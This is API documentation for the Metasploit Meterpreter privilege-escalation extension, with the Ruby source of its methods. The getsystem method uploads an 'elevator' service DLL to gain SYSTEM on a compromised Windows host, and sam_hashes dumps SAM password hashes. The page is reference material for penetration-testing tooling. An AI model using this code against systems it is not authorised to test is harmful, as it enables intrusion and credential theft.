class Rex::Post::Meterpreter::Extensions::Priv::Priv
This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.
Attributes
fs[R]
Modifying privileged file system attributes.
Public Class Methods
new(client)
click to toggle source
Initializes the privilege escalationextension.
Calls superclass method
Rex::Post::Meterpreter::Extension::new
# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 24 def initialize(client) super(client, 'priv') client.register_extension_aliases( [ { 'name' => 'priv', 'ext' => self }, ]) # Initialize sub-classes self.fs = Fs.new(client) end
Public Instance Methods
getsystem( technique=0 )
click to toggle source
Attempt to elevate the meterpreter to Local SYSTEM
# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 42 def getsystem( technique=0 ) request = Packet.create_request( 'priv_elevate_getsystem' ) elevator_name = Rex::Text.rand_text_alpha_lower( 6 ) elevator_path = MetasploitPayloads.meterpreter_path('elevator', client.binary_suffix) if elevator_path.nil? raise RuntimeError, "elevator.#{binary_suffix} not found", caller end elevator_data = "" ::File.open( elevator_path, "rb" ) { |f| elevator_data += f.read( f.stat.size ) } request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique ) request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name ) request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data ) request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length ) # as some service routines can be slow we bump up the timeout to 90 seconds response = client.send_request( request, 90 ) technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE ) if( response.result == 0 and technique != nil ) client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" ) client.sys.config.getprivs if client.framework.db and client.framework.db.active client.framework.db.report_note( :host => client.sock.peerhost, :workspace => client.framework.db.workspace, :type => "meterpreter.getsystem", :data => {:technique => technique} ) rescue nil end return [ true, technique ] end return [ false, 0 ] end
sam_hashes()
click to toggle source
Returns an array of SAM hashes from the remote machine.
# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 88 def sam_hashes # This can take a long long time for large domain controls, bump the timeout to one hour response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600) response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash| SamUser.new(hash) } end